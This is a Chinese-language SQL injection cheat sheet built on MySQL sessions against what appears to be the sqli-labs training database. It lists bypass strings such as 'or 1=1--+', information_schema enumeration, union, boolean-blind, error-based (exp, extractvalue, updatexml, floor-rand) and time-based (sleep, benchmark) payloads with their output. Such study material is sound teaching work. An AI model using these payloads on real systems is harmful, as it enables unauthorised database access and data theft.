系统函数
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.25 |
+-----------+
1 row in set (0.00 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select database();
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)
mysql> select @@datadir;
+-----------------------------------+
| @@datadir |
+-----------------------------------+
| D:\mysql-5.7.25-winx64\data\ |
+-----------------------------------+
1 row in set (0.00 sec)
mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win64 |
+----------------------+
1 row in set (0.00 sec)
mysql> select @@basedir;
+------------------------------+
| @@basedir |
+------------------------------+
| D:\mysql-5.7.25-winx64\ |
+------------------------------+
1 row in set (0.00 sec)
字符串连接函数
# concat没有分隔符地连接字符串
mysql> select concat("s", "elect");
+----------------------+
| concat("s", "elect") |
+----------------------+
| select |
+----------------------+
1 row in set (0.00 sec)
# concat_ws 有分隔符地连接字符串
mysql> select concat_ws(",", "a", "b", "c");
+-------------------------------+
| concat_ws(",", "a", "b", "c") |
+-------------------------------+
| a,b,c |
+-------------------------------+
1 row in set (0.00 sec)
mysql> select concat_ws("|", "a", "b", "c");
+-------------------------------+
| concat_ws("|", "a", "b", "c") |
+-------------------------------+
| a|b|c |
+-------------------------------+
1 row in set (0.00 sec)
# group_concat连接一个组的所有字符串,并以逗号分隔每一条数据
mysql> select group_concat(username) from users;
+---------------------------------------------------------+
| group_concat(username) |
+---------------------------------------------------------+
| Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin |
+---------------------------------------------------------+
1 row in set (0.02 sec)
information_schema
# 获取所有数据库
select schema_name from information_schema.SCHEMATA;
# 获取表名
select table_name from information_schema.tables WHERE table_schema=database();
# 查看所有字段
select group_concat(column_name) FROM information_schema.columns WHERE table_name='user';
一般用于替换的语句
or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+
一般GET请求中的+会自动替换为空格,还可以用%20来代替空格。
使用#注释,可以编码为%23,因为url中的#与sql中的注释#冲突,一般不会直接把#传到服务端。
union 操作符
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。但是UNION 内部的 SELECT 语句必须拥有相同数量的列。
默认地,UNION 操作符选取不同的值。如果允许重复的值,请使用 UNION ALL。
mysql> (select id, username from users limit 1) union (select 1, 2);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
| 1 | 2 |
+----+----------+
2 rows in set (0.00 sec)
mysql> (select id, username from users limit 1) union (select username, id from users limit 1);
+------+----------+
| id | username |
+------+----------+
| 1 | Dumb |
| Dumb | 1 |
+------+----------+
2 rows in set (0.00 sec)
mysql> (select id, username from users limit 1) union (select id,username from users limit 1);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
+----+----------+
1 row in set (0.00 sec)
mysql> (select id, username from users limit 1) union all (select id,username from users limit 1);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
| 1 | Dumb |
+----+----------+
2 rows in set (0.00 sec)
正则
mysql> select username from users WHERE username regexp '^D';
+----------+
| username |
+----------+
| Dumb |
| Dummy |
+----------+
2 rows in set (0.01 sec)
mysql> select user() regexp '^r';
+--------------------+
| user() regexp '^r' |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)
逻辑判断
mysql> select left(database(), 1)= 's';
+--------------------------+
| left(database(), 1)= 's' |
+--------------------------+
| 1 |
+--------------------------+
1 row in set (0.00 sec)
mysql> select left(database(), 1)> 's';
+--------------------------+
| left(database(), 1)> 's' |
+--------------------------+
| 0 |
+--------------------------+
1 row in set (0.00 sec)
逻辑判断
mysql> SELECT ascii(substr("emails", 1, 1));
+-------------------------------+
| ascii(substr("emails", 1, 1)) |
+-------------------------------+
| 101 |
+-------------------------------+
1 row in set (0.00 sec)
# ascii和ord函数一样,将字符转为 ascii 值
# substr和mid函数一样
mysql> SELECT ord(substr("emails", 1, 1));
+-----------------------------+
| ord(substr("emails", 1, 1)) |
+-----------------------------+
| 101 |
+-----------------------------+
1 row in set (0.00 sec)
mysql> SELECT ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1));
+----------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1)) |
+----------------------------------------------------------------------------------------------------------------+
| 101 |
+----------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101;
+--------------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101 |
+--------------------------------------------------------------------------------------------------------------------+
| 1 |
+--------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ord(mid((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101;
+---------------------------------------------------------------------------------------------------------------+
| ord(mid((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101 |
+---------------------------------------------------------------------------------------------------------------+
| 1 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select ifnull(cast(username as char), 0x20) from users order by id limit 1;
+--------------------------------------+
| ifnull(cast(username as char), 0x20) |
+--------------------------------------+
| Dumb |
+--------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ord(mid((select ifnull(cast(username as char), 0x20) from users order by id limit 1), 1, 1))=0x44;
+---------------------------------------------------------------------------------------------------+
| ord(mid((select ifnull(cast(username as char), 0x20) from users order by id limit 1), 1, 1))=0x44 |
+---------------------------------------------------------------------------------------------------+
| 1 |
+---------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
exp报错
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
mysql> select log(15);
+------------------+
| log(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select ln(15);
+------------------+
| ln(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
| 15 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
exp报错注入
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
mysql> select log(15);
+------------------+
| log(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select ln(15);
+------------------+
| ln(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
| 15 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
参考:https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/
extractvalue(1,concat(0x7e,(select @@version),0x7e))
--+ mysql 对 xml 数据进 行查询和修改的 xpath 函数,xpath 语法错误
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
--+ mysql 对 xml 数据进行 查询和修改的 xpath 函数,xpath 语法错误
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
--+ mysql 重复特性,此处重复了 version,所以报错
select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x
bigint注入
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
参考:https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/
基于时间的盲注
mysql> select if(ascii(substr(database(),1,1))>115, 0, sleep(5));
+----------------------------------------------------+
| if(ascii(substr(database(),1,1))>115, 0, sleep(5)) |
+----------------------------------------------------+
| 0 |
+----------------------------------------------------+
1 row in set (5.00 sec)
mysql> SELECT IF(SUBSTRING(database(),1,1)=char(115),BENCHMARK(5000000,ENCODE('M SG','by 5 seconds')),null);
+-----------------------------------------------------------------------------------------------+
| IF(SUBSTRING(database(),1,1)=char(115),BENCHMARK(5000000,ENCODE('M SG','by 5 seconds')),null) |
+-----------------------------------------------------------------------------------------------+
| 0 |
+-----------------------------------------------------------------------------------------------+
1 row in set, 65535 warnings (1.16 sec)